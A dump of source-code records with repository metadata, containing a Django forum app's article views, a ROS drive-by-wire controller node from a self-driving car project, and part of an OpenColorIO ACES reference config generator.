] | null | null | null | forumdemo/article/views.py | lamdba0602/forumdemo | 82c6223d6b6d7fb3bac049e342d3048a5117a2b7 | [
"Apache-2.0"
] | null | null | null | forumdemo/article/views.py | lamdba0602/forumdemo | 82c6223d6b6d7fb3bac049e342d3048a5117a2b7 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import redirect
from django.shortcuts import render
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from article.forms import ArticleForm
from article.models import Article
from block.models import Block
from comment.models import Comment
def article_list(request, block_id):
ARTICLE_CNT_1PAGE = 1
page_no = int(request.GET.get("page_no", "1"))
block_id = int(block_id)
block = Block.objects.get(id=block_id)
articles_objs = Article.objects.filter(block=block, status=0).order_by("-id")
page_articles, pagination_data = paginate_queryset(articles_objs, page_no, ARTICLE_CNT_1PAGE)
return render(request, "article_list.html", {"articles": page_articles, "b": block,
"pagination_data": pagination_data})
def paginate_queryset(objs, page_no, cnt_per_page=10, half_show_length=5):
p = Paginator(objs, cnt_per_page)
if page_no > p.num_pages:
page_no = p.num_pages
if page_no <= 0:
page_no = 1
page_links = [i for i in range(page_no - half_show_length, page_no + half_show_length + 1)
if i > 0 and i <= p.num_pages]
page = p.page(page_no)
previous_link = page_links[0] - 1
next_link = page_links[-1] + 1
pagination_data = {"page_cnt": p.num_pages,
"page_no": page_no,
"page_links": page_links,
"previous_link": previous_link,
"next_link": next_link,
"has_previous": previous_link > 0,
"has_next": next_link <= p.num_pages}
return (page.object_list, pagination_data)
@login_required
def article_create(request, block_id):
block_id = int(block_id)
block = Block.objects.get(id=block_id)
if request.method == "GET":
return render(request, "article_create.html", {"b": block})
else:
form = ArticleForm(request.POST)
if form.is_valid():
article = form.save(commit=False)
article.owner = request.user
article.block = block
article.status = 0
article.save()
return redirect("/article/list/%s" % block_id)
else:
return render(request, "article_create.html", {"b": block, "form": form})
def article_detail(request, article_id):
page_no = int(request.GET.get("page_no", "1"))
article_id = int(article_id)
article = Article.objects.get(id=article_id)
comments = Comment.objects.filter(article=article).order_by("-id")
page_comments, pagination_data = paginate_queryset(comments, page_no, 2)
return render(request, "article_detail.html", {"article": article,
"comments": page_comments,
"pagination_data": pagination_data})
| 39.146667 | 97 | 0.628065 | from django.shortcuts import redirect
from django.shortcuts import render
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from article.forms import ArticleForm
from article.models import Article
from block.models import Block
from comment.models import Comment
def article_list(request, block_id):
ARTICLE_CNT_1PAGE = 1
page_no = int(request.GET.get("page_no", "1"))
block_id = int(block_id)
block = Block.objects.get(id=block_id)
articles_objs = Article.objects.filter(block=block, status=0).order_by("-id")
page_articles, pagination_data = paginate_queryset(articles_objs, page_no, ARTICLE_CNT_1PAGE)
return render(request, "article_list.html", {"articles": page_articles, "b": block,
"pagination_data": pagination_data})
def paginate_queryset(objs, page_no, cnt_per_page=10, half_show_length=5):
p = Paginator(objs, cnt_per_page)
if page_no > p.num_pages:
page_no = p.num_pages
if page_no <= 0:
page_no = 1
page_links = [i for i in range(page_no - half_show_length, page_no + half_show_length + 1)
if i > 0 and i <= p.num_pages]
page = p.page(page_no)
previous_link = page_links[0] - 1
next_link = page_links[-1] + 1
pagination_data = {"page_cnt": p.num_pages,
"page_no": page_no,
"page_links": page_links,
"previous_link": previous_link,
"next_link": next_link,
"has_previous": previous_link > 0,
"has_next": next_link <= p.num_pages}
return (page.object_list, pagination_data)
@login_required
def article_create(request, block_id):
block_id = int(block_id)
block = Block.objects.get(id=block_id)
if request.method == "GET":
return render(request, "article_create.html", {"b": block})
else:
form = ArticleForm(request.POST)
if form.is_valid():
article = form.save(commit=False)
article.owner = request.user
article.block = block
article.status = 0
article.save()
return redirect("/article/list/%s" % block_id)
else:
return render(request, "article_create.html", {"b": block, "form": form})
def article_detail(request, article_id):
page_no = int(request.GET.get("page_no", "1"))
article_id = int(article_id)
article = Article.objects.get(id=article_id)
comments = Comment.objects.filter(article=article).order_by("-id")
page_comments, pagination_data = paginate_queryset(comments, page_no, 2)
return render(request, "article_detail.html", {"article": article,
"comments": page_comments,
"pagination_data": pagination_data})
| true | true |
f70ffef3c196a246295ef81a2cfd74f59b7eae71 | 7,088 | py | Python | ros/src/twist_controller/dbw_node.py | russell13192/CarND-Capstone | 1c182de5fb71f021f33518fe54e5ba27748a424d | [
"MIT"
] | 1 | 2019-08-19T20:36:45.000Z | 2019-08-19T20:36:45.000Z | ros/src/twist_controller/dbw_node.py | russell13192/CarND-Capstone | 1c182de5fb71f021f33518fe54e5ba27748a424d | [
"MIT"
] | null | null | null | ros/src/twist_controller/dbw_node.py | russell13192/CarND-Capstone | 1c182de5fb71f021f33518fe54e5ba27748a424d | [
"MIT"
] | 3 | 2019-08-19T20:40:33.000Z | 2019-09-22T18:56:50.000Z | #!/usr/bin/env python
# import cte_calculator
from geometry_msgs.msg import PoseStamped
import rospy
from std_msgs.msg import Bool
from styx_msgs.msg import Lane
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
You can build this node only after you have built (or partially built) the `waypoint_updater` node.
You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.
You can subscribe to any other message that you find important or refer to the document for list
of messages subscribed to by the reference implementation of this node.
One thing to keep in mind while building this node and the `twist_controller` class is the status
of `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will
not be the case. This may cause your PID controller to accumulate error because the car could
temporarily be driven by a human instead of your controller.
We have provided two launch files with this node. Vehicle specific values (like vehicle_mass,
wheel_base) etc should not be altered in tbhese files.
We have also provided some reference implementations for PID controller and other utility classes.
You are free to use them or build your own.
Once you have the proposed throttle, brake, and steer values, publish it on the various publishers
that we have created in the `__init__` function.
'''
class DBWNode(object):
def __init__(self):
rospy.init_node('dbw_node')
vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
brake_deadband = rospy.get_param('~brake_deadband', .1)
decel_limit = rospy.get_param('~decel_limit', -5)
accel_limit = rospy.get_param('~accel_limit', 1.)
wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
wheel_base = rospy.get_param('~wheel_base', 2.8498)
steer_ratio = rospy.get_param('~steer_ratio', 14.8)
max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
BrakeCmd, queue_size=1)
# Subscribe to all the topics you need to
# rospy.Subscriber('/subscriber message name', variable type, callback function, queue_size=1)
self.twist_sub = rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb, queue_size=1)
self.velocity_sub = rospy.Subscriber('/current_vel', TwistStamped, self.current_msg_cb, queue_size=1)
self.dbw_sub = rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb, queue_size=1)
self.final_wp_sub = rospy.Subscriber('final_waypoints', Lane, self.final_waypoints_cb, queue_size=1)
self.pose_sub = rospy.Subscriber('/current_pose', PoseStamped, self.current_pose_cb, queue_size=1)
# TODO: Create `Controller` object
self.controller = Controller(vehicle_mass=vehicle_mass,
fuel_capacity = fuel_capacity,
brake_deadband = brake_deadband,
decel_limit = decel_limit,
accel_limit = accel_limit,
wheel_radius = wheel_radius,
wheel_base = wheel_base,
steer_ratio = steer_ratio,
max_lat_accel = max_lat_accel,
max_steer_angle = max_steer_angle)
# self.controller = Controller(<Arguments you wish to provide>)
# TODO: Subscribe to all the topics you need to
rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
rospy.Subscriber('/current_velocity',TwistStamped,self.velocity_cb)
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = None
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
self.loop()
def loop(self):
rate = rospy.Rate(50) # 50Hz
while not rospy.is_shutdown():
# Get predicted throttle, brake, and steering using `twist_controller`
# You should only publish the control commands if dbw is enabled
# throttle, brake, steering = self.controller.control(<proposed linear velocity>,
# <proposed angular velocity>,
# <current linear velocity>,
# <dbw status>,
# <any other argument you need>)
# if <dbw is enabled>:
# self.publish(throttle, brake, steer)
if not None in (self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(
self.current_vel,
self.dbw_enabled,
self.linear_vel,
self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
def dbw_enabled_cb(self, msg):
self.dbw_enabled = msg
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
def current_msg_cb(self, message):
self.current_vel = message.twist.linear.x
def final_waypoints_cb(self, message):
self.final_waypoints = message.waypoints
def current_pose_cb(self, message):
self.current_pose = message
if __name__ == '__main__':
DBWNode() | 55.375 | 109 | 0.616253 |
from geometry_msgs.msg import PoseStamped
import rospy
from std_msgs.msg import Bool
from styx_msgs.msg import Lane
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
class DBWNode(object):
def __init__(self):
rospy.init_node('dbw_node')
vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
brake_deadband = rospy.get_param('~brake_deadband', .1)
decel_limit = rospy.get_param('~decel_limit', -5)
accel_limit = rospy.get_param('~accel_limit', 1.)
wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
wheel_base = rospy.get_param('~wheel_base', 2.8498)
steer_ratio = rospy.get_param('~steer_ratio', 14.8)
max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
BrakeCmd, queue_size=1)
self.twist_sub = rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb, queue_size=1)
self.velocity_sub = rospy.Subscriber('/current_vel', TwistStamped, self.current_msg_cb, queue_size=1)
self.dbw_sub = rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb, queue_size=1)
self.final_wp_sub = rospy.Subscriber('final_waypoints', Lane, self.final_waypoints_cb, queue_size=1)
self.pose_sub = rospy.Subscriber('/current_pose', PoseStamped, self.current_pose_cb, queue_size=1)
self.controller = Controller(vehicle_mass=vehicle_mass,
fuel_capacity = fuel_capacity,
brake_deadband = brake_deadband,
decel_limit = decel_limit,
accel_limit = accel_limit,
wheel_radius = wheel_radius,
wheel_base = wheel_base,
steer_ratio = steer_ratio,
max_lat_accel = max_lat_accel,
max_steer_angle = max_steer_angle)
rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
rospy.Subscriber('/current_velocity',TwistStamped,self.velocity_cb)
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = None
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
self.loop()
def loop(self):
rate = rospy.Rate(50)
while not rospy.is_shutdown():
if not None in (self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(
self.current_vel,
self.dbw_enabled,
self.linear_vel,
self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
def dbw_enabled_cb(self, msg):
self.dbw_enabled = msg
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
def current_msg_cb(self, message):
self.current_vel = message.twist.linear.x
def final_waypoints_cb(self, message):
self.final_waypoints = message.waypoints
def current_pose_cb(self, message):
self.current_pose = message
if __name__ == '__main__':
DBWNode() | true | true |
f70fff870565855a3fc51fd9d30f07cd0448c020 | 36,690 | py | Python | opencolorio_config_aces/config/reference/generate/config.py | rdaniels29/OpenColorIO-Config-ACES | ed0d77ad47fd50ad6e71813980d589b2b44cf272 | [
"BSD-3-Clause"
] | null | null | null | opencolorio_config_aces/config/reference/generate/config.py | rdaniels29/OpenColorIO-Config-ACES | ed0d77ad47fd50ad6e71813980d589b2b44cf272 | [
"BSD-3-Clause"
] | null | null | null | opencolorio_config_aces/config/reference/generate/config.py | rdaniels29/OpenColorIO-Config-ACES | ed0d77ad47fd50ad6e71813980d589b2b44cf272 | [
"BSD-3-Clause"
] | null | null | null | # SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
"""
*aces-dev* Reference Config Generator
=====================================
Defines various objects related to the generation of the *aces-dev* reference
*OpenColorIO* config:
- :func:`opencolorio_config_aces.generate_config_aces`
"""
import csv
import logging
import re
from collections import defaultdict
from datetime import datetime
from enum import Flag, auto
from pathlib import Path
from opencolorio_config_aces.config.generation import (
ConfigData, colorspace_factory, generate_config, look_factory,
view_transform_factory)
from opencolorio_config_aces.config.reference import (
classify_aces_ctl_transforms, discover_aces_ctl_transforms,
unclassify_ctl_transforms)
from opencolorio_config_aces.utilities import git_describe, required
__author__ = 'OpenColorIO Contributors'
__copyright__ = 'Copyright Contributors to the OpenColorIO Project.'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'OpenColorIO Contributors'
__email__ = 'ocio-dev@lists.aswf.io'
__status__ = 'Production'
__all__ = [
'ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH',
'ACES_CONFIG_REFERENCE_COLORSPACE',
'ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE',
'ACES_CONFIG_COLORSPACE_NAME_SEPARATOR',
'ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR',
'ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR',
'ACES_CONFIG_DISPLAY_FAMILY', 'COLORSPACE_NAME_SUBSTITUTION_PATTERNS',
'LOOK_NAME_SUBSTITUTION_PATTERNS',
'TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS',
'VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS',
'DISPLAY_NAME_SUBSTITUTION_PATTERNS', 'ColorspaceDescriptionStyle',
'beautify_name', 'beautify_colorspace_name', 'beautify_look_name',
'beautify_transform_family', 'beautify_view_transform_name',
'beautify_display_name', 'ctl_transform_to_colorspace_name',
'ctl_transform_to_look_name', 'ctl_transform_to_transform_family',
'ctl_transform_to_description', 'ctl_transform_to_colorspace',
'ctl_transform_to_look', 'create_builtin_transform',
'style_to_view_transform', 'style_to_display_colorspace',
'generate_config_aces'
]
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH = (
Path(__file__).parents[0] / 'resources' /
'OpenColorIO-ACES-Config Transforms - Reference Config - Mapping.csv')
"""
Path to the *ACES* *CTL* transforms to *OpenColorIO* colorspaces mapping file.
CONFIG_MAPPING_FILE_PATH : unicode
"""
ACES_CONFIG_REFERENCE_COLORSPACE = 'ACES2065-1'
"""
*OpenColorIO* config reference colorspace.
ACES_CONFIG_REFERENCE_COLORSPACE : unicode
"""
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE = 'OCES'
"""
*OpenColorIO* config output encoding colorspace.
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE : unicode
"""
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR = ' - '
"""
*OpenColorIO* config colorspace name separator.
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR = '/'
"""
*OpenColorIO* config colorspace family separator.
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR : unicode
"""
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR = '_to_'
"""
*OpenColorIO* config *BuiltinTransform* name separator.
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_DISPLAY_FAMILY = 'Display'
"""
*OpenColorIO* config display family.
ACES_CONFIG_DISPLAY_FAMILY : unicode
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS = {
'ACES_0_1_1': 'ACES 0.1.1',
'ACES_0_2_2': 'ACES 0.2.2',
'ACES_0_7_1': 'ACES 0.7.1',
'_7nits': '',
'_15nits': '',
'_': ' ',
'-raw': '',
'-': ' ',
'\\b(\\w+)limited\\b': '(\\1 Limited)',
'\\b(\\d+)nits\\b': '(\\1 nits)',
'RGBmonitor': 'sRGB',
'Rec709': 'Rec. 709',
'Rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* colorspace name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
COLORSPACE_NAME_SUBSTITUTION_PATTERNS : dict
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS.update({
# Input transforms also use the "family" name and thus need beautifying.
(f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}Alexa'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}v\\d+'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}.*'):
'',
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}':
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR,
})
LOOK_NAME_SUBSTITUTION_PATTERNS = {
# TODO: Implement support for callable patterns.
# The following one should be a dedicated definition/callable.
'BlueLightArtifactFix': 'Blue Light Artifact Fix'
}
"""
*OpenColorIO* look name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
LOOK_NAME_SUBSTITUTION_PATTERNS : dict
"""
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS = {
'\\\\': ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR,
'vendorSupplied[/\\\\]': '',
'arri': 'ARRI',
'alexa': 'Alexa',
'canon': 'Canon',
'panasonic': 'Panasonic',
'red': 'RED',
'sony': 'Sony',
}
"""
*OpenColorIO* transform family substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS : dict
"""
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS = {
'7.2nit': '&',
'15nit': '&',
'lim': ' lim',
'nit': ' nits',
'sim': ' sim on',
'CINEMA': 'Cinema',
'VIDEO': 'Video',
'REC1886': 'Rec.1886',
'REC709': 'Rec.709',
'REC2020': 'Rec.2020',
'-': ' ',
}
"""
*OpenColorIO* view transform name substitution patterns.
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS : dict
"""
DISPLAY_NAME_SUBSTITUTION_PATTERNS = {
'G2.6-': '',
'-BFD': '',
'REC.1886': 'Rec.1886',
'REC.709': 'Rec.709 Video',
'REC.2020': 'Rec.2020 Video',
'REC.2100': 'Rec.2100',
'-Rec.': ' / Rec.',
'-1000nit': '',
# Legacy Substitutions
'dcdm': 'DCDM',
'p3': 'P3',
'rec709': 'Rec. 709',
'rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* display name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
DISPLAY_NAME_SUBSTITUTION_PATTERNS : dict
"""
class ColorspaceDescriptionStyle(Flag):
"""
Enum storing the various *OpenColorIO* colorspace description styles.
"""
NONE = auto()
ACES = auto()
OPENCOLORIO = auto()
SHORT = auto()
LONG = auto()
SHORT_UNION = ACES | OPENCOLORIO | SHORT
LONG_UNION = ACES | OPENCOLORIO | LONG
def beautify_name(name, patterns):
"""
Beautifies given name by applying in succession the given patterns.
Parameters
----------
name : unicode
Name to beautify.
patterns : dict
Dictionary of regular expression patterns and substitution to apply
onto the name.
Returns
-------
unicode
Beautified name.
Examples
--------
>>> beautify_name(
... 'Rec709_100nits_dim',
... COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
'Rec. 709 (100 nits) dim'
"""
for pattern, substitution in patterns.items():
name = re.sub(pattern, substitution, name)
return name.strip()
def beautify_colorspace_name(name):
"""
Beautifies given *OpenColorIO* colorspace name by applying in succession
the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* colorspace name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* colorspace name.
Examples
--------
>>> beautify_colorspace_name('Rec709_100nits_dim')
'Rec. 709 (100 nits) dim'
"""
return beautify_name(name, COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
def beautify_look_name(name):
"""
Beautifies given *OpenColorIO* look name by applying in succession the
relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* look name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* look name.
Examples
--------
>>> beautify_look_name('BlueLightArtifactFix')
'Blue Light Artifact Fix'
"""
return beautify_name(name, LOOK_NAME_SUBSTITUTION_PATTERNS)
def beautify_transform_family(name):
"""
Beautifies given *OpenColorIO* colorspace family by applying in succession
the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* colorspace family to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* colorspace family.
Examples
--------
>>> beautify_transform_family('vendorSupplied/arri/alexa/v3/EI800')
'ARRI/Alexa/v3/EI800'
"""
return beautify_name(name, TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS)
def beautify_view_transform_name(name):
"""
Beautifies given *OpenColorIO* view transform name by applying in
succession the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* view transform name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* view transform name.
Examples
--------
>>> beautify_view_transform_name(
... 'ACES-OUTPUT - ACES2065-1_to_CIE-XYZ-D65 - SDR-CINEMA_1.0')
'Output - SDR Cinema - ACES 1.0'
"""
basename, version = name.split(ACES_CONFIG_COLORSPACE_NAME_SEPARATOR)[
-1].split('_')
tokens = basename.split('-')
family, genus = (['-'.join(tokens[:2]), '-'.join(tokens[2:])]
if len(tokens) > 2 else [basename, None])
family = beautify_name(family, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
genus = (beautify_name(genus, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
if genus is not None else genus)
return (f'Output - {family} ({genus}) - ACES {version}'
if genus is not None else f'Output - {family} - ACES {version}')
def beautify_display_name(name):
"""
Beautifies given *OpenColorIO* display name by applying in succession the
relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* display name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* display name.
Examples
--------
>>> beautify_display_name('DISPLAY - CIE-XYZ-D65_to_sRGB')
'Display - sRGB'
>>> beautify_display_name('rec709')
'Display - Rec. 709'
"""
basename = name.split(ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR)[-1]
name = beautify_name(basename, DISPLAY_NAME_SUBSTITUTION_PATTERNS)
return f'Display - {name}'
def ctl_transform_to_colorspace_name(ctl_transform):
"""
Generates the *OpenColorIO* colorspace name for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace name
for.
Returns
-------
unicode
*OpenColorIO* colorspace name.
"""
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_colorspace_name(name)
def ctl_transform_to_look_name(ctl_transform):
"""
Generates the *OpenColorIO* look name for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* look name for.
Returns
-------
unicode
*OpenColorIO* look name.
"""
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_look_name(name)
def ctl_transform_to_transform_family(ctl_transform, analytical=True):
"""
Generates the *OpenColorIO* transform family for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* transform family
for.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Returns
-------
unicode
*OpenColorIO* transform family.
"""
if analytical:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
family = 'CSC'
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
else:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
if re.match('ACES|ADX', ctl_transform.name):
family = 'ACES'
else:
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
return beautify_transform_family(family)
@required('OpenColorIO')
def ctl_transform_to_description(
ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
factory=colorspace_factory,
**kwargs):
"""
Generates the *OpenColorIO* colorspace or look description for given
*ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
describe : bool, optional
Whether to use the full *ACES* *CTL* transform description or just the
first line.
factory : callable, optional
Factory used to adjust the code paths because of slight difference
of signature between the *OpenColorIO* colorspace and look.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
unicode
*OpenColorIO* colorspace or look description.
"""
import PyOpenColorIO as ocio
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
forward, inverse = ([
'to_reference',
'from_reference',
] if factory is colorspace_factory else [
'forward_transform',
'inverse_transform',
])
transforms = [
transform for transform in (kwargs.get(forward),
kwargs.get(inverse))
if transform is not None
]
transform = next(iter(transforms), None)
if isinstance(transform, ocio.BuiltinTransform):
description.append(transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
if len(description) > 0:
description.append('')
aces_transform_id = (
ctl_transform.aces_transform_id.aces_transform_id)
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.append(f'ACEStransformID: {aces_transform_id}')
else:
description.append('CTL Transform')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'{ctl_transform.description}\n')
description.append(f'ACEStransformID: {aces_transform_id}')
description = '\n'.join(description)
return description
def ctl_transform_to_colorspace(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
"""
Generates the *OpenColorIO* colorspace for given *ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
describe : bool, optional
Whether to use the full *ACES* *CTL* transform description or just the
first line.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* colorspace.
"""
name = ctl_transform_to_colorspace_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
colorspace_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'family':
family,
'description':
description,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
